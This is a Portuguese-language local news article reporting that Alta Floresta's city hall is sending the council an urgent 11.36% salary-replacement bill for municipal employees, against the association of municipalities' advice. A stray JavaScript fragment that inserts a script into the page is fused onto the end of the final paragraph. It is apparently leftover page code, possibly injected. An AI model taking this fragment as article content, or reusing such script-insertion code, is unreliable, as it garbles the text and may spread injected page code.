Capa / Educação / Prefeitura envia para Câmara projeto de reposição dos funcionários

Prefeitura envia para Câmara projeto de reposição dos funcionários

PrefeituraDionéia Martins

A Prefeitura Municipal de Alta Floresta, após realizar um estudo sobre o impacto na folha de pagamento, decidiu que a reposição salarial dos funcionários será de 11,36%.
O projeto será enviando para a Câmara Municipal hoje em regime de urgência, para que os funcionários já recebam o pagamento do mês de janeiro com valor corrigido. Segundo o Secretário de Administração, Claudinei de Souza Jesus, a decisão de igualar a reposição para todos os funcionários foi do prefeito Asiel Bezerra de Araújo.
“A gente já tinha sido provocado pela câmara de vereadores e pelo Sispumaf sobre essa situação da recomposição salarial das perdas inflacionárias, então foi feita o estudo junto com o pessoal da administração e o financeiro, e apresentado para comissão que é composta pela vereadora Elisa e o sindicato, e nesse estudo achou por bem apresentar uma proposta de 11,36 % que são perdas salariais”, disse o Secretário.
As perdas inflacionárias fechou o ano em 11,28%, mas o índice do piso da educação nacional foi aprovado em 11,36%. O impacto na folha de pagamento da Prefeitura será de R$ 4 milhões ao ano.
Considerando que os recursos são insuficientes para absorver o impacto nas finanças municipais, a Associação Mato-grossense dos Municípios (AMM), recomendou que os gestores sejam cautelosos com o reajuste salarial.
“Tivemos a recomendação da AMM para não fazer a reposição salarial devido a situação em que se encontra os municípios, mas o prefeito mesmo sabendo dessa dificuldade achou por bem dá a reposição para o funcionários”, finalizou Claudinei.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top